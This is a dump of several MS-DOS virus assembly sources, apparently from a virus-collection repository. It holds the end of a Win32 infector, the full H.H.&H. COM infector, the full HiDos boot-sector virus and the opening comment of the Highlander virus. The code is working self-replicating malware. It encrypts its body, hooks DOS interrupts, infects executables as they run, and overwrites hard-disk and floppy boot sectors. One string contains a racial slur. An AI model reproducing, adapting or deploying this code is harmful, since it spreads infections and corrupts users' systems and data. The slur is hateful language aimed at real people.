pushad
call hookInfectAnsi
popad
popfd
ret
className db '[Heretic] by Memory Lapse',0
message db 'For my thug niggaz.. uptown baby, uptown.',0
szKernel db '\KERNEL32.DLL',0
szImageHlp db 'IMAGEHLP',0
szChecksumMappedFile db 'CheckSumMappedFile',0
szSetupApi db 'SETUPAPI',0
szSetupInstallFileExA db 'SetupInstallFileExA',0
szWinInitFile db 'WININIT.INI',0
szAppName db 'Rename',0
szKeyName db 'NUL',0
name_ptr_api:
ddCloseHandle: crc
ddCopyFileA: crc
ddCreateFileA: crc
ddCreateFileMappingA: crc
ddDeleteFileA: crc
ddFreeLibrary: crc
ddGetFileAttributesA: crc
ddGetFileTime: crc
ddGetProcAddress: crc
ddGetSystemDirectoryA: crc
ddGetWindowsDirectoryA: crc
ddGlobalAlloc: crc
ddGlobalFree: crc
ddIsBadCodePtr: crc
ddLoadLibraryA: crc
ddMapViewOfFile: crc
ddSetFileAttributesA: crc
ddSetFileTime: crc
ddUnmapViewOfFile: crc
ddWideCharToMultiByte: crc
ddWritePrivateProfileStringA: crc
ddlstrcatA: crc
ddlstrcpyA: crc
ddlstrlenA: crc
name_ptr_api_end:
; absolute offsets of desired API
CloseHandle dd 0
CopyFileA dd 0
CreateFileA dd 0
CreateFileMappingA dd 0
DeleteFileA dd 0
FreeLibrary dd 0
GetFileAttributesA dd 0
GetFileTime dd 0
GetProcAddress dd 0
GetSystemDirectoryA dd 0
GetWindowsDirectoryA dd 0
GlobalAlloc dd 0
GlobalFree dd 0
IsBadCodePtr dd 0
LoadLibraryA dd 0
MapViewOfFile dd 0
SetFileAttributesA dd 0
SetFileTime dd 0
UnmapViewOfFile dd 0
WideCharToMultiByte dd 0
WritePrivateProfileStringA dd 0
lstrcatA dd 0
lstrcpyA dd 0
lstrlenA dd 0
_end:
host: call MessageBoxA, \
NULL, \
L offset lpText, \
L offset lpCaption, \
L 0 ;MB_OK
call ExitProcess, \
L 0
.data
lpCaption db 'Memory Lapse has something to say..',0
lpText db 'Hello World!',0
end start
MSDOS/H-Index/Virus.MSDOS.Unknown.hh&h.asm
+901
View File
@@ -0,0 +1,901 @@
CODE segment para public 'code'
assume cs:code,ds:code,es:nothing,ss:nothing
org 100h
egy equ 1 ; one
dma equ 0b0h
atvar equ 300 ; at paramaeter
xtvar equ 1 ; xt parameter
suruseg equ 255 ; density
idotartalek equ 18*30 ; time delay
start: db 0e9h,0,0
;##################### Initialization ######################
resid: push ax
mov cx,offset memory - offset begin ;#### decoding ####
mov bx,ds:[101h]
add bx,103h+(offset begin-offset resid)
jhg1: xor byte ptr [bx],0
inc bx
loop jhg1
begin: sub bx,(offset begin-offset resid)+(offset memory - offset begin)
mov cs:[0feh],bx
mov ax,[bx+(offset eltarol-offset resid)]
mov cl,[bx+(offset eltarol-offset resid)+2]
mov ds:[100h],ax
mov ds:[102h],cl
mov cx,0b800h
mov ah,15
push bx
int 10h
pop bx
cmp al,7
jne rety
mov ch,0b0h
rety: mov [bx+(offset ruut - offset resid)+1],cx
mov word ptr [bx+(offset counter-offset resid)],idotartalek
mov byte ptr [bx+(offset jammed-offset resid)+1],al
mov byte ptr [bx+(offset vanesik-offset resid)],0
xor ax,ax
mov ds,ax
cmp word ptr ds:[130h],4142h
je zipp
mov ds:[130h],4142h
mov ax,cs
dec ax
mov ds,ax
mov ax,ds:[3]
sub ax,180h
mov ds:[3],ax
add ax,ds:[1]
mov es,ax
push cs
pop ds
sub word ptr ds:[2],384
mov di,3
mov si,bx
mov cx,(offset memory-offset resid) shr 1 +1
cld
rep movsw
mov ax,es
sub ax,10h
mov ds,ax
mov dx,offset irq
mov ax,251ch
int 21h
mov ah,2ah
int 21h
cmp al,1
jne zipp
dec al
out 0a0h,al
mov al,dma
out 41h,al
zipp:
mov ax,cs
mov ds,ax
mov es,ax
pop ax
push cs
mov cx,100h
push cx
mov cx,ds:[0feh]
sub cx,100h
retf
eltarol dw 20cdh
eltarol2 db 90h
;######################### Vyrus activated ##########################
csik: mov ax,0e000h
mov ds,ax
csiky: mov ds:[0],al
inc al
jmp csiky
;######################### propagation part ##########################
eredeti: db 0eah ; original
int211 dw 0
int212 dw 0
counter dw 0
szaporodas: cmp ah,4bh
jne eredeti
or al,al
jnz eredeti
push ax
push es
push bx
push ds
push dx
mov bx,dx
koj: inc bx
cmp byte ptr [bx],'.'
jne koj
cmp byte ptr[bx+1],'C'
jne kiugras1
mov cs:kds,ds
mov cs:kdx,dx
mov cs:kbx,bx
call probe
kiugras1: pop dx
pop ds
pop bx
pop es
pop ax
jmp eredeti
kds dw 0
kdx dw 0
kbx dw 0
kkk dw 0
fszam dw 0
probe: push cs
pop es
mov di,offset memory
mov si,dx
mov cx,40
cld
rep movsw
mov bx,0ff0h
mov ah,48h
int 21h
jnc juk1
ret
;!!!!! memoria lefoglalva (kkk = Seg)
atr dw 0
juk1: mov cs:kkk,ax
mov dx,offset memory
push ds
pop es
mov bx,cs:kbx
mov byte ptr [bx+1],'A'
call elorutin
push cs
pop ds ;DS:DX a masolt nev.
mov ax,4300h
int 21h
mov atr,cx
xor cx,cx
mov ax,4301h
int 21h
;!!!!! Attr allitas
cmp cs:attrflag,0
jz juk2
mov ds,cs:kds
jmp memoff
juk2: mov di,kdx ;ES:DI a regi nev atirva
mov ah,56h
int 21h
call utorutin ;!!!!! Atnevezve
mov dx,cs:kdx
push es
pop ds
mov ax,3d02h
int 21h ;!!!!! File megnyitva
mov cs:fszam,ax
mov ds,cs:kkk
xor dx,dx
mov bx,ax
mov cx,0fc00h-(offset memory-offset resid)
mov ah,3fh
int 21h
cmp ax,0fc00h-(offset memory-offset resid)
;!!!!! Beolvasva a program (csak a hossza miatt)
je hosszu ;zarjuk le a file-t
cmp ax,7580
jb hosszu ;tul rovid a file
mov di,ax
mov bx,ds:[1]
cmp word ptr [bx+3],0b950h
;$$$$$$$$$$$$$$$$$$$$$$$$$ FUCK OFF TASM,MASM $$$$$$$$$$$$$$$$$$$$$$$$$$$
je hosszu
push di
mov cx,(offset memory-offset resid)
mov si,offset resid
push ds
pop es
push cs
pop ds
inc byte ptr ds:[offset jhg1 +2]
mov ax,es:[0]
mov eltarol,ax
mov al,es:[2]
mov eltarol2,al
rep movsw ;!!!!! Atmasolva (hehe)
mov al,byte ptr ds:[offset jhg1 +2]
pop di
add di,(offset begin-offset resid)
mov cx,offset memory - offset begin ;#### coding ####
jhga: xor byte ptr es:[di],al
inc di
loop jhga
sub di,(offset memory - offset resid)
push di ;Az ugrasi hely
mov bx,fszam
mov cx,offset memory - offset begin
mov dx,di
push es
pop ds
mov ah,40h
int 21h
pop di
cmp ax,offset memory - offset begin
je ghj1
hosszu: jmp zardle
ghj1: ;!!!!! Kiirva a vege
mov byte ptr ds:[0],0e9h
sub di,3
mov ds:[1],di
mov bx,cs:fszam
xor cx,cx
xor dx,dx
mov ax,4200h
push bx
int 21h
pop bx
mov cx,3
xor dx,dx
mov ah,40h
int 21h
zardle: mov bx,cs:fszam
mov ah,3eh
int 21h ;!!!!! File lezarva
push cs
pop es
mov di,offset memory
mov ds,cs:kds
mov dx,cs:kdx
mov ah,56h
int 21h ;!!!!! File visszanevezve
mov bx,cs:kbx
mov byte ptr ds:[bx+1],'C'
mov ax,4301h
mov cx,cs:atr
int 21h ;!!!!! attr visszaall
memoff: mov bx,cs:kbx
mov byte ptr ds:[bx+1],'C'
push cs
pop ds
mov es,cs:kkk
mov ah,49h
int 21h ;!!!!! Memoria visszaalt
ret
it241 dw 0
it242 dw 0
attrflag db 0
elorutin: mov cs:attrflag,0
xor ax,ax
mov ds,ax
mov ax,ds:[90h]
mov cs:it241,ax
mov ax,ds:[92h]
mov cs:it242,ax
mov ds:[90h],offset it24
mov ds:[92h],cs
ret
utorutin: xor ax,ax
mov ds,ax
mov ax,cs:it241
mov ds:[90h],ax
mov ax,cs:it242
mov ds:[92h],ax
ret
it24: mov cs:attrflag,1
xor al,al
iret
vanesik db 0
irq: cli
push ds
push es
push ax
push bx
push cx
push dx
push si
push di
cmp cs:counter,0
je sabad
dec cs:counter
jne sabad
xor ax,ax
mov ds,ax
mov ax,ds:[84h]
mov cs:int211,ax
mov ax,ds:[86h]
mov cs:int212,ax
mov ds:[84h],offset szaporodas
mov ds:[86h],cs
sabad: cmp cs:vanesik,0
je keress
call idovan
jmp jumper
keress: call ruut
jumper: pop di
pop si
pop dx
pop cx
pop bx
pop ax
pop es
pop ds
iret
idovan: xor ah,ah
int 1ah
and dx,suruseg
jne rutyi
call action
rutyi: ret
ruut: mov ax,0b800h
mov es,ax
mov di,cs:did
mov cx,512
cld
poke: jcxz huy
mov al,'E'
repnz scasb
jz talalt
huy: cmp di,4095
jb kisebb
mov cs:did,0
ret
kisebb: add cs:did,512
ret
did dw 0
talalt: test di,1
jz poke
mov dl,es:[di+1]
mov dh,es:[di+3]
or dx,2020h
cmp dx,6973h ;'is'
jne poke
mov bl,es:[di+5]
or bl,20h
cmp bl,'k'
jne poke
mov cs:vanesik,1
jmp huy
action: mov ax,cs
mov ds,ax
mov es,ax
mov vanesik,0
mov pontszam,1
mov si,offset zizi
mov di,offset novi
cld
mov cx,6
rep movsw
call zoldseg
jammed: mov ax,3
int 10h
cmp counterr,atvar
jne fdr
push cs
pop es
lea bx,mess
mov ax,1301h
mov bx,1
xor dx,dx
mov cx,offset drt-offset mess
int 10h
fdr: ret
counterr dw 0
zoldseg: cli
mov di,offset memory
xor ax,ax
cld
mov cx,200*3
rep stosw
mov ah,0c0h
mov si,3333h
int 15h
cmp si,3333h
mov ax,xtvar
je xt
mov ax,atvar
xt: mov counterr,ax
mov ax,3502h
int 21h
cmp bx,0e9eh
jne ibm
call init1
mov pontm,100
mov port,22h
jmp entry
ibm: ;Ibm bulik
mov pontm,200
mov al,70h
mov port,60h ;%
mov ah,15
int 10h
cmp al,7
jne cga
call init3
jmp entry
cga: call init2
jmp entry
port dw 22h
pontm dw 100
init1: mov ax,200h
mov es,ax
xor di,di
mov cx,4000h
cld
xor ax,ax
rep stosw
mov plotdw,offset plot
mov unplotdw,offset unplot
ret
init2: mov ax,0b800h
mov es,ax
mov ax,6
int 10h
mov plotdw,offset plotcga
mov unplotdw,offset unplotcga
ret
init3: mov ax,0b000h
mov es,ax
call prog
mov plotdw,offset plotherc
mov unplotdw,offset unplotcga
ret
prog: mov dx,3bfh
mov al,3
out dx,al
mov al,28h
mov dx,3b8h
out dx,al
mov ah,0
mov cx,12
lea bx,ports
lopi1: mov dx,03b4h
mov al,ah
out dx,al
inc ah
mov dx,03b5h
mov al,[bx]
out dx,al
inc bx
loop lopi1
mov dx,3bfh
mov al,3
out dx,al
mov dx,3b8h
mov al,0ah
out dx,al
xor di,di
mov cx,4000h
xor ax,ax
cld
rep stosw
ret
ports db 35h,2dh,2eh,7,5bh,2,57h,57h,2,3,0,0
;**************************** Forgatorutin ************************************
even
sina dw 0
cosa dw 0 ;si-t meghagyja
sinb dw 0
cosb dw 0
pontszam dw 1
transzform: ;be: di=X, bx=Y, cx=Z, SINA,COSA,SINB,COSB
; add bx,ytol ;ez itt jolesz
shl di,1
shl bx,1 ;X es Y elokeszitese a szorzashoz
mov ax,di
imul cosa
mov bp,dx
mov ax,bx
imul sina
add bp,dx ; bp=X' = cosa*X + sina*Y
mov ax,bx
imul cosa
mov bx,dx
mov ax,di
imul sina
sub bx,dx ; bx=Y' = cosa*X - sina*Y
shl bp,1
shl cx,1 ;X' es Z elokeszitese
mov ax,bp
imul cosb
mov di,dx
mov ax,cx
imul sinb
sub di,dx ; di=X'' = cosb*X' - sinb*Z
mov cx,di
mov ax,bx
ret
comment @
mov ax,cx
imul cosb
mov cx,dx
mov ax,bp
imul sinb
add cx,dx ; cx=Z'' = cosb*Z = sinb*X'
; out: di=X'' bx=Y'' cx=Z''
mov dx,keptav
;****************************** PERSPEKTIVA **********************************
mov ax,di
shl ax,1
imul tavol
mov cx,dx
mov ax,bx
shl ax,1
imul tavol
mov ax,dx
ret ; ki : CX=X' AX=Y'
@
plotherc: ; al=y cx=x
xor ah,ah
mov dx,ax
shr dx,1
add ax,dx
mov dx,cx
mov cl,al
and cl,3
shr ax,1
shr al,1
mov di,2000h
shl di,cl
mov cl,90
mul cl
add di,ax
mov ax,dx
mov cx,dx
jmp ezisi
plotcga: xor di,di
shr ax,1
jnc tryp
mov di,2000h
tryp: mov dl,80
mul dl
add di,ax
mov ax,cx
ezisi: shr ax,1
shr ax,1
shr ax,1
add di,ax
and cl,7
mov al,128
shr al,cl
or es:[di],al
jmp ezis1
unplotcga: mov al,[bx]
mov di,[bx+1]
xor al,255
and es:[di],al
ret
plot: ;AL = y koord. cx = x koord.
mov dl,160
mul dl
mov di,ax
mov ax,cx
shr ax,1
shr ax,1
add di,ax
and di,-2
and cl,7
mov al,128
shr al,cl
or es:[di+egy],al
ezis1: mov [bx],al
inc bx
mov [bx],di
add bx,2
ret
unplot: mov al,[bx]
mov di,[bx+1]
xor al,255
and es:[di+egy],al
ret
kezdfazisrajz: mov bx,offset memory
mov si,offset gombdata
mov cx,pontszam
ck1: push cx
lodsw
mov cx,ax
shl cx,1
add cx,320
lodsw
add si,2
add ax,50
call word ptr [plotdw]
pop cx
loop ck1
ret
indy db 0
fazisrajz: mov bx,offset memory
mov si,offset gombdata
mov cx,pontszam
mov indy,1
ck12: push cx
call word ptr [unplotdw]
push bx
lodsw
mov di,ax
lodsw
mov bx,ax
lodsw
mov cx,ax
call transzform
pop bx
add ax,50
mov di,bxpo
add al,[di]
shl cx,1
add cx,bxpo2
cmp indy,0
je ruty
mov indy,0
cmp karal2,0
jne ruty
push cx
push ax
inc cx
call word ptr [plotdw]
pop ax
pop cx
sub bx,3
ruty: call word ptr [plotdw]
pop cx
loop ck12
ret
novpont: mov ax,pontm
cmp pontszam,ax
je trew
mov cx,pontm
sub cx,pontszam
mov ch,cl
shR cx,1
shr cx,1
yut: loop yut
inc pontszam
ret
trew: call movie
mov bx,bxpo
cmp bx,offset patt
je valto
cmp bx,offset patt+29
je valto
iuy: add bx,novi
mov bxpo,bx
ret
valto: neg novi
jmp iuy
novi dw -1
bxpo dw offset patt
bxpo2 dw 320
novi2 dw 4
karal dw 300
karal2 dw 600
zizi dw -1,offset patt,320,4,300,600
movie: cmp karal,0
je jesty
dec karal
ret
jesty: cmp karal2,0
je jesty2
dec karal2
jesty2: mov bx,bxpo2
cmp bx,100
je valto2
cmp bx,540
je valto2
iuy2: add bx,novi2
mov bxpo2,bx
ret
valto2: neg novi2
jmp iuy2
elokesz: call novpont
mov bl,szogx
xor bh,bh
shl bx,1
mov ax,sintabl[bx]
mov sina,ax
mov ax,costabl[bx]
mov cosa,ax
mov bl,szogy
xor bh,bh
shl bx,1
mov ax,sintabl[bx]
mov sinb,ax
mov ax,costabl[bx]
mov cosb,ax
mov al,szogxvalt
add szogx,al
mov al,szogyvalt
add szogy,al
ret
even
szogx db 0
szogy db 0
szogxvalt db 2
szogyvalt db 5
tavol dw 32767
phase: call elokesz
call fazisrajz
ret
entry: call kezdfazisrajz
rajta1: call phase
cmp pontm,100
je apc
cmp byte ptr ds:[offset ruut +2],0b8h
je ccggaa
mov cx,counterr
mov dx,3bah
qaz1: in al,dx
and al,1
jnz qaz1
qaz2: in al,dx
and al,1
jz qaz2
loop qaz1
jmp apc
ccggaa: mov dx,3dah
qaz3: in al,dx
and al,8
jnz qaz3
qaz4: in al,dx
and al,8
jz qaz4
apc: mov dx,port
in al,dx
and al,1
jz rajta1
ret
even
plotdw dw 0
unplotdw dw 0
sintabl dw 0, 804, 1608, 2410, 3212, 4011, 4808, 5602, 6393
dw 7179, 7962, 8739, 9512, 10278, 11039, 11793, 12539, 13279
dw 14010, 14732, 15446, 16151, 16846, 17530, 18204, 18868, 19519
dw 20159, 20787, 21403, 22005, 22594, 23170, 23731, 24279, 24811
dw 25329, 25832, 26319, 26790, 27245, 27683, 28105, 28510, 28898
dw 29268, 29621, 29956, 30273, 30571, 30852, 31113, 31356, 31580
dw 31785, 31971, 32137, 32285, 32412, 32521, 32609, 32678, 32728
dw 32757, 32767, 32757, 32728, 32678, 32609, 32521, 32412, 32285
dw 32137, 31971, 31785, 31580, 31356, 31113, 30852, 30571, 30273
dw 29956, 29621, 29268, 28898, 28510, 28105, 27683, 27245, 26790
dw 26319, 25832, 25329, 24811, 24279, 23731, 23170, 22594, 22005
dw 21403, 20787, 20159, 19519, 18868, 18204, 17530, 16846, 16151
dw 15446, 14732, 14010, 13279, 12539, 11793, 11039, 10278, 9512
dw 8739, 7962, 7179, 6393, 5602, 4808, 4011, 3212, 2410
dw 1608, 804, 0, -804, -1608, -2410, -3212, -4011, -4808
dw -5602, -6393, -7179, -7962, -8739, -9512,-10278,-11039,-11793
dw -12539,-13279,-14010,-14732,-15446,-16151,-16846,-17530,-18204
dw -18868,-19519,-20159,-20787,-21403,-22005,-22594,-23170,-23731
dw -24279,-24811,-25329,-25832,-26319,-26790,-27245,-27683,-28105
dw -28510,-28898,-29268,-29621,-29956,-30273,-30571,-30852,-31113
dw -31356,-31580,-31785,-31971,-32137,-32285,-32412,-32521,-32609
dw -32678,-32728,-32757,-32767,-32757,-32728,-32678,-32609,-32521
dw -32412,-32285,-32137,-31971,-31785,-31580,-31356,-31113,-30852
dw -30571,-30273,-29956,-29621,-29268,-28898,-28510,-28105,-27683
dw -27245,-26790,-26319,-25832,-25329,-24811,-24279,-23731,-23170
dw -22594,-22005,-21403,-20787,-20159,-19519,-18868,-18204,-17530
dw -16846,-16151,-15446,-14732,-14010,-13279,-12539,-11793,-11039
dw -10278, -9512, -8739, -7962, -7179, -6393, -5602, -4808, -4011
dw -3212, -2410, -1608, -804
costabl dw 32767, 32757, 32728, 32678, 32609, 32521, 32412, 32285
dw 32137, 31971, 31785, 31580, 31356, 31113, 30852, 30571
dw 30273, 29956, 29621, 29268, 28898, 28510, 28105, 27683
dw 27245, 26790, 26319, 25832, 25329, 24811, 24279, 23731
dw 23170, 22594, 22005, 21403, 20787, 20159, 19519, 18868
dw 18204, 17530, 16846, 16151, 15446, 14732, 14010, 13279
dw 12539, 11793, 11039, 10278, 9512, 8739, 7962, 7179
dw 6393, 5602, 4808, 4011, 3212, 2410, 1608, 804
dw 0, -804, -1608, -2410, -3212, -4011, -4808, -5602
dw -6393, -7179, -7962, -8739, -9512,-10278,-11039,-11793
dw -12539, -13279,-14010,-14732,-15446,-16151,-16846,-17530
dw -18204, -18868,-19519,-20159,-20787,-21403,-22005,-22594
dw -23170, -23731,-24279,-24811,-25329,-25832,-26319,-26790
dw -27245, -27683,-28105,-28510,-28898,-29268,-29621,-29956
dw -30273, -30571,-30852,-31113,-31356,-31580,-31785,-31971
dw -32137, -32285,-32412,-32521,-32609,-32678,-32728,-32757
dw -32767, -32757,-32728,-32678,-32609,-32521,-32412,-32285
dw -32137, -31971,-31785,-31580,-31356,-31113,-30852,-30571
dw -30273, -29956,-29621,-29268,-28898,-28510,-28105,-27683
dw -27245, -26790,-26319,-25832,-25329,-24811,-24279,-23731
dw -23170, -22594,-22005,-21403,-20787,-20159,-19519,-18868
dw -18204, -17530,-16846,-16151,-15446,-14732,-14010,-13279
dw -12539, -11793,-11039,-10278, -9512, -8739, -7962, -7179
dw -6393, -5602, -4808, -4011, -3212, -2410, -1608, -804
dw 0, 804, 1608, 2410, 3212, 4011, 4808, 5602
dw 6393, 7179, 7962, 8739, 9512, 10278, 11039, 11793
dw 12539, 13279, 14010, 14732, 15446, 16151, 16846, 17530
dw 18204, 18868, 19519, 20159, 20787, 21403, 22005, 22594
dw 23170, 23731, 24279, 24811, 25329, 25832, 26319, 26790
dw 27245, 27683, 28105, 28510, 28898, 29268, 29621, 29956
dw 30273, 30571, 30852, 31113, 31356, 31580, 31785, 31971
dw 32137, 32285, 32412, 32521, 32609, 32678, 32728, 32757
gombdata:
DW 44, 3, 22, 29, 6, 40, 7, 9, 48,-14, 12, 46
DW -33, 15, 33,-44, 18, 14,-44, 21, -7,-35, 24,-25
DW -19, 26,-37, 0, 29,-40, 17, 31,-34, 29, 34,-21
DW 33, 36, -5, 30, 38, 9, 20, 40, 20, 8, 42, 25
DW -3, 43, 23,-12, 45, 17,-16, 46, 8,-15, 47, 0
DW -11, 48, -5, -5, 49, -7, 0, 49, -6, 0, 49, -2
DW 0, 49, 0, -2, 49, 0, -6, 49, 0, -7, 49, -5
DW -5, 48,-11, 0, 47,-15, 8, 46,-16, 17, 45,-12
DW 23, 43, -3, 25, 42, 8, 20, 40, 20, 9, 38, 30
DW -5, 36, 33,-21, 34, 29,-34, 31, 17,-40, 29, 0
DW -37,26,-19,-25,24,-35,-7,21,-44,14,18,-44
DW 33,15,-33,46,12,-14,48,9,7,40,6,29
DW 22,3,44,0,0,49,-22,-3,44,-40,-6,29
DW -48,-9,7,-46,-12,-14,-33,-15,-33,-14,-18,-44
DW 7,-21,-44,25,-24,-35,37,-26,-19,40,-29,0
DW 34,-31,17,21,-34,29,5,-36,33,-9,-38,30
DW -20,-40,20,-25,-42,8,-23,-43,-3,-17,-45,-12
DW -8,-46,-16,0,-47,-15,5,-48,-11,7,-49,-5
DW 6,-49,0,2,-49,0,0,-49,0,0,-49,-2
DW 0,-49,-6,5,-49,-7,11,-48,-5,15,-47,0
DW 16,-46,8,12,-45,17,3,-43,23,-8,-42,25
DW -20,-40,20,-30,-38,9,-33,-36,-5,-29,-34,-21
DW -17,-31,-34,0,-29,-40,19,-26,-37,35,-24,-25
DW 44,-21,-7,44,-18,14,33,-15,33,14,-12,46
DW -7,-9,48,-29,-6,40,-44,-3,22,-49,0,0
DW -44,3,-22,-29,6,-40,-7,9,-48,14,12,-46
DW 33,15,-33,44,18,-14,44,21,7,35,24,25
DW 19,26,37,0,29,40,-17,31,34,-29,34,21
DW -33,36,5,-30,38,-9,-20,40,-20,-8,42,-25
DW 3,43,-23,12,45,-17,16,46,-8,15,47,0
DW 11,48,5,5,49,7,0,49,6,0,49,2
DW 0,49,0,2,49,0,6,49,0,7,49,5
DW 5,48,11,0,47,15,-8,46,16,-17,45,12
DW -23,43,3,-25,42,-8,-20,40,-20,-9,38,-30
DW 5,36,-33,21,34,-29,34,31,-17,40,29,0
DW 37,26,19,25,24,35,7,21,44,-14,18,44
DW -33,15,33,-46,12,14,-48,9,-7,-40,6,-29
DW -22,3,-44,0,0,-49,22,-3,-44,40,-6,-29
DW 48,-9,-7,46,-12,14,33,-15,33,14,-18,44
DW -7,-21,44,-25,-24,35,-37,-26,19,-40,-29,0
DW -34,-31,-17,-21,-34,-29,-5,-36,-33,9,-38,-30
DW 20,-40,-20,25,-42,-8,23,-43,3,17,-45,12
DW 8,-46,16,0,-47,15,-5,-48,11,-7,-49,5
DW -6,-49,0,-2,-49,0,0,-49,0,0,-49,2
DW 0,-49,6,-5,-49,7,-11,-48,5,-15,-47,0
DW -16,-46,-8,-12,-45,-17,-3,-43,-23,8,-42,-25
DW 20,-40,-20,30,-38,-9,33,-36,5,29,-34,21
DW 17,-31,34,0,-29,40,-19,-26,37,-35,-24,25
DW -44,-21,7,-44,-18,-14,-33,-15,-33,-14,-12,-46
DW 7,-9,-48,29,-6,-40,44,-3,-22,49,0,0
patt: DB 0, 0, 0, 0, 0, 1, 1, 2, 4, 5, 7, 9,11,14,17,20,23,27
db 31,35,40,45,50,56,61,67,73,80,86,93
mess db 'HARD HIT & HEAVY HATE the HUMANS !!'
db ' [ H.H.& H.H. the H. ] '
drt dw 5 dup (0)
memory:
CODE ENDS
END START
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
MSDOS/H-Index/Virus.MSDOS.Unknown.hidos.asm
+213
View File
@@ -0,0 +1,213 @@
NAME boot
PAGE 55,132
TITLE FILE UTIL
code segment
ASSUME CS:CODE,DS:CODE,ES:CODE
org 100h
main: jmp over
db '['
id db 'HiDos]',0
by db 'By Apache',0
over: xor ax,ax
mov ds,ax
cli
mov ss,ax
mov sp,7c00h
sti
mov ax,ds:[004eh]
mov word ptr ds:[int13+7b02h],ax
mov ax,ds:[004ch]
mov word ptr ds:[int13+7b00h],ax
mov ax,ds:[0413h]
dec ax
dec ax
mov ds:[0413h],ax
mov cl,06h
shl ax,cl
mov es,ax
mov word ptr ds:[bigj+7b02h],es
mov ax,offset jumpt
mov word ptr ds:[bigj+7b00h],ax
mov cx,0400h
push cs
pop ds
mov si,7c00h
mov di,0100h
cld
repz
movsb
push cs
pop ds
jmp cs:[bigj+7b00h]
jumpt: push cs
pop ds
mov si,offset drive
cmp byte ptr ds:[si],80h
jz hdone
mov bx,0300h
mov cx,0001h
mov dx,0080h
push cs
pop es
call hdread
cmp ds:[0304h],'iH'
jz hdone
mov bx,0300h
mov cx,0007h
mov dx,0080h
call hdwrit
mov si,04beh
mov di,02beh
mov cx,0042h
cld
repz
movsb
mov byte ptr ds:[drive],80h
mov bx,0100h
mov cx,0001h
mov dx,0080h
call hdwrit
mov byte ptr ds:[drive],00h
hdone: xor ax,ax
mov word ptr cs:[boot+2],ax
mov es,ax
push cs
pop ds
mov ax,0201h
mov bx,7c00h
mov word ptr ds:[boot],bx
mov si,offset drive
cmp byte ptr ds:[si],80h
jz hload
mov cx,0003h
mov dx,0100h
jmp fload
hload: mov cx,0007h
mov dx,0080h
fload: mov di,'rv'
int 13h
mov si,offset drive
mov byte ptr cs:[si],00h
xor ax,ax
mov es,ax
mov ds,ax
mov ax,offset nint13
mov ds:[004ch],ax
mov ds:[004eh],cs
push cs
pop ds
jmp cs:[boot]
hdwrit: mov ax,0301h
mov di,'rv'
jmp xx4
hdread: mov ax,0201h
mov di,'rv'
xx4: int 13h
ret
nint13: cmp di,'rv'
jz iv13
cmp ah,02h
jnz wcheck
cmp cl,01h
jnz wcheck
cmp dh,00h
jnz wcheck
cmp dl,80h
jz check1
cmp dl,00h
jnz wcheck
check1: push ax
push bx
push cx
push dx
push ds
push es
push di
mov bx,0300h
push cs
pop es
call hdread
mov si,offset [id+0200h]
cmp es:[si],'iH'
jz redirect
jmp iflopd
redirect: cmp dl,80h
jnz rdirfl
pop di
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
mov cx,0007h
jmp a13
rdirfl: pop di
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
mov cx,0003h
mov dx,0100h
a13: mov ax,0201h
iv13: jmp v13
wcheck: cmp ah,03h
jnz v13
cmp dl,00h
jnz v13
push ax
push bx
push cx
push dx
push ds
push es
push di
push cs
pop es
mov bx,0300h
mov cx,0001h
xor dx,dx
call hdread
mov si,offset [id+0200h]
cmp es:[si],'iH'
jz iflopd
mov cx,0003h
mov dx,0100h
mov bx,0300h
call hdwrit
mov bx,0100h
xor dx,dx
mov cx,0001h
call hdwrit
iflopd: pop di
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
v13: db 0eah
int13 dd 0h
drive db 0h
bigj dd 0h
boot dd 0h
code ends
end main
MSDOS/H-Index/Virus.MSDOS.Unknown.highland.asm
+422
View File
@@ -0,0 +1,422 @@
;HIGHLAND.COM
;This is the HIGHLANDER Virus version 1.0.
;This virus is a generic, parasitic, resident COM infector. It will not
;infect command.com however. It is not destructive but can be irritating.
;Interrupt 21 is hooked.
;This virus is to be assembled under TASM 2.0 with the /m2 switch.
;When an infected file is executed, the virus code is executed first.
;The virus first checks to see if the virus is already resident. It does
;this by setting the AH register to 0DEh. This subfunction is currently
;unsupported by DOS. Interrupt 21 is then called. If after the call, AH is
;unchanged, the virus is not resident. If AH no longer contains 0DEh, the
;virus is assumed to be resident (If the virus is resident, AH will actually
;be changed to 0EDh. This is never checked for, only a change from 0DEh
;is checked for). If the virus is already resident, the executing viral
;code will restore the host in memory to original condition and allow it
;to execute normally. If however, the virus is not resident, Interrupt 21
;will then be trapped by the virus. Once this is accomplished, the virus
;will free all available memory that it does not need (COM programs are
;allocated all available memory when they are executed even though they can
;only occupy one segment). The viral code will then copy the original
;environment and determine the path and filename of the host program in
;memory. The viral code will then shell out and re-execute the host
;program. The virus is nearly resident now. When the virus shells out
;and re-executes the host, a non-supported value is passed in the AL
;register. This is interpreted by the virus to mean that the infection
;is in transition and that when the host is re-executed, to assume that the
;virus is already resident. This value is then changed to the proper value
;so that the shell process will execute normally (INT 21 is already trapped
;at this point). This shell process is invisible, since the viral code
;so successfully copies the original environment. Once the host has
;finished executing, control is then returned back to the original host
;(the viral code). The virus then completes execution by going resident
;using interrupt 027h. In all appearances, the host program has just
;completed normal execution and has terminated. In actuality, the virus
;is now fully resident.
;When the virus is resident, interrupt 021h is trapped and monitored.
;When a program is executed, the resident virus gets control (DOS executes
;programs by shelling from DOS using interrupt 021h, subfunction 04bh).
;When the virus sees that a program is being executed, a series of checks
;are performed. The first thing checked for is whether or not the program
;to be executed has 'D' as the seventh letter in the filename. If it does
;the program is not infected and is allowed to execute normally (this is
;how the virus keeps from infecting COMMAND.COM. No COM file with a 'D'
